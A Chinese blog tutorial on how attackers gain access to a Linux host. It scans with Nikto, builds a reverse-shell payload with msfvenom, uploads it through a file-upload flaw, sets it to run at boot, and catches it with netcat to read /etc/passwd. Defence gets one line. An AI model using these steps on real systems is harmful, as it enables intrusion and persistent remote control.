黑客是如何绕过ssh登录目标站点

已于 2024-09-20 17:27:11 修改
阅读量541 收藏 11
点赞数 5
文章标签: 网络 服务器 运维 开源软件 嵌入式Linux linux 网络安全
于 2024-09-20 17:21:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whh_bjqy/article/details/142390765
版权

      黑客绕过SSH登录目标站点的手法多种多样,其中一些技术不仅复杂且极具隐蔽性,严重威胁着网络安全。SSH(安全外壳协议)作为一种广泛使用的远程登录协议,虽然本身具备一定的安全特性,但仍然是黑客攻击的重要目标之一。黑客通过利用SSH协议的特点和存在的安全漏洞,采取包括SSH欺骗、暴力破解密码、设置SSH后门以及绕过身份验证机制等多种手段,实现对目标站点的非法访问和控制。
      接下来,我们将深入探讨黑客如何利用这些手段绕过SSH登录目标站点,以便更好地理解其背后的技术原理和防御策略。这不仅有助于提升网络安全意识,也为制定相应的防护措施提供了宝贵的参考。

Nikto介绍

一个开源的 Web 服务器扫描器,它就像你网络安全工具箱中的瑞士军刀,帮助你发现潜在的安全漏洞。

望获系统安装nikto:

dnf install nikto

扫描目标

假设你有一个目标网站,比如 `http://example.com`。让我们开始扫描吧:

nikto -h http://example.com

扫描结果

扫描完成后,Nikto 会输出一些信息,比如:

找到的潜在漏洞

安全配置问题

  默认的 Web 应用程序和目录

每一条信息都是你冒险中的发现,帮助你更好地了解目标系统。

找到一个上传文件漏洞

从nikto找到一个上传文件漏洞。需要查阅对应服务器版本以及相关已修复漏洞。在此只做原理性解释和介绍。

重点:生成木马

使用metasploit工具msfvenom创建:

msfvenom -p linux/x64/shell_reverse_tcp -f elf lhost=192.168.77.133 lport=4444 > x64-re-shell

-p 指定平台为64位x86,系统为linux

-f  payload格式

lhost 黑客ip

lport 黑客设备的端口

根据小节4中的上传漏洞上传该木马并设置开机启动

演示

黑客设备上监听4444端口,执行:

nc -l -p 4444

受害者设备启动模拟:

黑客设备端显示:

黑客端拿下/etc/passwd。

总结

黑客绕过ssh加密认证登录,通过上传reverse shell拿下受害者设备。

防范措施:

通过端口安全管理,只开放经过安全认证的端口,快去看看你的设备端口有没有连接陌生ip。

望获linux
关注
Linux系统入侵】——SSH远程登录
爱国小白帽
03-01 8765
ssh是什么? ssh是一种通信协议,用于与另一台计算机通信,有多个实现版本,openssh属于开源实现 实验准备: 虚拟机 两台linux系统(一台做入侵机一台做受害机) 两台机子都用NAT模式连接局域网 开始入侵实验: 1、首先查看本机IP在什么网段,如图在192.168.70.0网段 2、然后使用namp扫描此网段存在的主机,如:namp -sP 192.168.70.0/24发...
Linux ssh服务
hj的博客
05-02 5235
ssh是什么? ssh --》 secure shell 安全的shell remote login program --远程登陆程序 对数据进行加密传输的服务,主要用在远程登陆,还用在scp,俩台机器之间传输文件。 SSH(Secure Shell,安全的外壳) 为客户机提供安全的Shell环境,用于远程管理。 默认端口:TCP 22 ssh协议是应用层协议。 ssh服务主要是在HP-UX,LINUX,AIX,UNIX系统上都有,windows上没有 关闭selinux安全机制,getenforce查看
黑客是做啥的
趁着年轻,多学学
11-24 2887
黑客是做啥的简单说明学习所需的技巧了解什么是黑客了解黑客的道德规范了解如何使用互联网和HTML了解如何编程获得一个基于Unix的开源系统并学习使用它hacking首先保护您的机器知道你的目标测试目标扫描端口在系统中查找路径或打开端口破解密码或认证过程创建一个后门掩盖您的足迹 简单说明 在流行媒体中,经常将黑客描绘成恶意角色,他们非法获得对计算机系统和网络的访问权限。 实际上,黑客只是对计算机系统和网络有广泛了解的人。 一些黑客(称为黑帽)确实确实将其技能用于非法和不道德的目的。 其他人则是为了应对挑战。 白
黑客解析】黑客是如何实现数据库勒索的?
QcloudCommunity的博客
03-10 2564
每一次重要通用漏洞的爆发总是会带来一片腥风血雨,任何微小的漏洞,基于43亿IPv4地址这个大基数,总是可以被放大! 从MongoDB开始到MySQL,黑客瞄准了数据库服务,通过黑客手段获取数据库服务的权限,然后删除数据,在数据库中插入勒索信息,要求支付比特币以赎回数据(可见扩展阅读)。那么黑客是如何实现这整个过程?
黑客是怎样练成的?
w56348的博客
09-07 420
黑客是指那些擅长计算机技术的人员。他们能够深入了解和理解计算机系统和网络的工作原理,并利用这些知识来保护系统和网络,同时也可以通过挖掘漏洞和进行攻击来测试系统的安全性。然而,黑客这个词在不同的语境中有着不同的含义。在一般的媒体报道中,黑客通常被描述为进行非法活动的人,例如破解密码、盗取个人信息或攻击网络。然而,这种负面的定义并不准确,因为黑客也可以是合法的安全专家,他们为了保护系统和网络而进行渗透测试和漏洞挖掘。因此,我们应该意识到黑客是一种技能和知识的表达,而非具有好坏之分的身份标签。
Linux下的用户管理及SSH禁止用户登录和IP连接的配置
程序的战歌
03-29 6449
用户管理会在各种配置中显示其强大的作用。当我们在不太会配置Linux的时候,配置了一个运行在不同用户下的网站,另一个帐户下的数据库,当我们网站被黑之后,至少让别人在黑数据库的过程中没有那么顺当——增加被攻击的复杂度就是在增加自己站点的安全性。好吧,不得不说,我是这个思路的。那毫不犹豫的就开始了 的操作。在Linux中,用户的管理分为组和用户两种。这个Windows下也是这个样子,组是一类用户的统称。
SSH隧道的动态转发
ailx10
08-08 103
本周五提交了人生中的第一个专利,也是工作3年来第一次写专利,先不说能不能过,至少态度ok了,下周准备再提交一个。写专利和做项目侧重点是不同的,专利抓眼的是创新性,而项目抓眼的是可用性、稳定性。回顾第一年的工作,AI waf机器学习用的兜哥的web安全实验,普普通通亮点不足,语义引擎直接用的开源组件,也没啥好写的,啧啧。本篇文章讲的是「SSH隧道的动态转发」,基本实验环境如下:kali rollin...
黑客是怎样入侵你的网站的
大明的博客
08-21 1万+
转自http://www.freebuf.com/articles/web/7359.html 这个问题很难回答,简单的来说,入侵一个网站可以有很多种方法。本文的目的是展示黑客们常用的扫描和入侵网站的技术。  假设你的站点是:hack-test.com 让我们来ping一下这个服务器: 我们得到了一个IP地址:173.236.138.113 – 这是
SSH、SSL与HTTPS
愿我如星君如月 ... 夜夜流光相皎洁 ...
04-12 1139
关于加密在解释SSH、SSL与HTTPS协议之前我先介绍一下非对称加密协议。在1976年以前,所有的加密都采用对称加密,既A使用某种加密规则对信息加密,B收到信息后逆向加密规则解密数据。这通信方式产生了一个难以解决的问题:A如何安全的把加密规则通知B?在1976年有两位数学家提出了一个崭新的非对加密的概念:1.A生成一对两把密钥(公钥和私钥)。公钥是公开的,任何人都可以获得,私钥则是保密的。 2....
使用SSH安全远程登录Linux服务器
# 1. 引言 ## 1.1 什么是SSHSSH(Secure Shell)是一种加密...在当今互联网中,保护数据安全和隐私已经成为了至关重要的问题,因此SSH协议应运而生,成为了远程登录和操作服务器的标准选择。 接下来我们将详细介
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 020-网络安全应急技术与实践(主机层-主机日志分析)
时光隧道
02-13 8万+
主机日志分析是指对主机产生的日志进行收集、解析和分析的过程。主机日志包含了主机运行时产生的各种事件和信息,如操作系统启动和停止、服务启动和停止、进程创建和终止、网络连接和断开等。通过对主机日志进行分析,可以识别异常事件和行为,及时发现系统故障和安全威胁,并采取相应的措施处理。步骤描述1收集日志:通过配置日志收集器或代理,将主机上的日志数据发送到集中的日志存储或分析平台。2解析日志:对收集到的日志数据进行解析,将其转化为结构化的数据格式,方便后续的分析和查询。3。
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入)
热门推荐
时光隧道
02-09 8万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全问题,确保Web应用程序的安全性。
计算机网络的数据链路层
2301_81152393的博客
10-30 316
数据链路层的主要功能是在物理层提供的服务的基础上向网络层提供服务,其最基本的服务是将源自网络层来的数据可靠地传输到相邻节点的目标网络层。数据链路层在现代计算机网络中扮演着重要角色,它确保了网络层以下的数据有效、可靠地在相邻节点之间传输。随着技术的发展,数据链路层也在不断演进,以支持更高速率、更低延迟和更强安全性的网络通信需求。数据链路层使用不同的方法将网络层的数据分组封装成帧,包括字符计数法、字符填充法、零比特填充法和违规编码法等。1.流量控制:控制发送方的数据发送速率,以匹配接收方的处理能力。
如何使用SOCKS5代理提升匿名性
dailiip1的博客
10-30 773
SOCKS5代理作为一种高效的网络匿名技术,能够为使用者提供多样化的应用场景和显著的隐私保护优势。透过正确配置和合理使用SOCKS5代理,使用者可以有效提升线上安全性,规避潜在的网络监控和攻击风险,享受更安全和自由的网络体验。未来随着网络安全需求的不断增长,SOCKS5代理技术的应用和发展将更加广泛和深入,为用户创造更安全可靠的网络环境。
tcp shutdown, fin_wait1, fin_wait2, close_wait, last_ack, 谢特!
Netfilter
10-31 832
状态很奇怪,人们很难接受一个连接在非 ESTABLISHED 状态下正常传输数据,这会引来一堆咨询,但根据 TCP 状态机,这又是合理的,client 单向关闭了发送,FIN 就过去了,server 回复了 FIN,进入 CLOSE_WAIT,client 收到回复进入 FIN_WAIT_2,而 server 在 CLOSE_WAIT 下发数据,client 在 FIN_WAIT_2 下是完全合理的。但如果应用程序希望如此呢?TCP 的 RFC793 并未规定状态超时时间,为完整闭环这是合理的。
第三章 I O 输入输出简介 - Use 命令
yaoxin521123的博客
10-28 284
此命令使指定设备成为当前设备,并将特殊变量$IO设置为该设备。要使用主设备以外的设备,必须首先对其发出OPEN命令;否则,将收到错误。参数的含义与OPEN命令中的相同。
AIGC时代的网络威胁和防御
最新发布
qq128252的博客
10-31 598
本文讨论了 AIGC 时代的网络攻击和防御,以及利用大型语言模型打造先进的交互式蜜罐系统。 关键要点包括: - 生成式 AI 成为网络威胁新宠:探讨了其在网络攻击中的滥用,如被网络犯罪分子利用生成和自动化攻击。 - 攻击方法多样:包括 Character Play、Switch Method、OccupyAI 等多种攻击方式。 - 研究结论与应对策略:发现生成式 AI 降低攻击门槛,增加攻击复杂度,提出加强网络安全框架等应对策略。 - 利用 LLM 打造蜜罐系统:介绍了利用 LLM 创建更高效蜜罐系统的研究
nginx 根路径同时代理 http ws sse 三种请求
DHclly的博客
10-28 457
HTTP(HyperText Transfer Protocol):超文本传输协议,是用于在客户端(通常是web浏览器)和服务器之间传输数据的协议。HTTP是Web的基础,用于请求和传输网页、图像、视频等资源。它采用请求-响应模型,支持多种方法(如GET、POST等),并可通过HTTP/1.1和HTTP/2等版本进行优化,以提高性能和用户体验。WebSocket:WebSocket是一种在单个TCP连接上进行全双工通信的协议。它允许客户端和服务器之间实现实时双向数据传输。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值